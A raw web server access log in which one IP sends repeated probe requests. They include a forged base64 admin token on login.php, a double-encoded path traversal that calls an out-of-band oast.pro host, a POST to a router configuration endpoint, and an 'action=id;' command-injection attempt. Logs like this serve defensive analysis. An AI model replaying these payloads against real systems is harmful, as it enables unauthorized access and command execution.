157.20.32.210 - - [18/Oct/2025:16:57:35 -0400] "GET /login.php?authorized=eyJ1c2VyIjogeyJuYW1lIjogImFkbWluIiwgImxvZ2luIjogImFkbWluIn0sInJvbGUiOnsibmFtZSI6ImFkbWluaXN0cmF0b3IiLCAicmVzdHJpY3Rpb25zIjogW10sImRlbGV0ZWFibGUiOiBmYWxzZX19 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/4.0"
157.20.32.210 - - [18/Oct/2025:16:57:40 -0400] "GET /render/public/..%252f%255Cd3pm34ikdbcl3g7iqchgug5miwxwuyope.oast.pro%252f%253F%252f..%252f.. HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:16:57:43 -0400] "POST /goform/set_hidessid_cfg HTTP/1.1" 200 0 "{[RootURL]}/admin/more.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:16:57:48 -0400] "GET /login.php?authorized=eyJ1c2VyIjogeyJuYW1lIjogImFkbWluIiwgImxvZ2luIjogImFkbWluIn0sInJvbGUiOnsibmFtZSI6ImFkbWluaXN0cmF0b3IiLCAicmVzdHJpY3Rpb25zIjogW10sImRlbGV0ZWFibGUiOiBmYWxzZX19 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/4.0"
157.20.32.210 - - [18/Oct/2025:16:57:51 -0400] "GET /render/public/..%252f%255Cd3pm34ikdbcl3g7iqchgug5miwxwuyope.oast.pro%252f%253F%252f..%252f.. HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:16:57:54 -0400] "POST /goform/set_hidessid_cfg HTTP/1.1" 200 0 "{[RootURL]}/admin/more.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:16:57:56 -0400] "GET /v.1.5/php/features/feature-transfer-export.php?action=id;&filename&varid&slot HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_5_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:16:58:04 -0400] "GET /render/public/..%252f%255Cd3pm34ikdbcl3g7iqchgug5miwxwuyope.oast.pro%252f%253F%252f..%252f.. HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15"
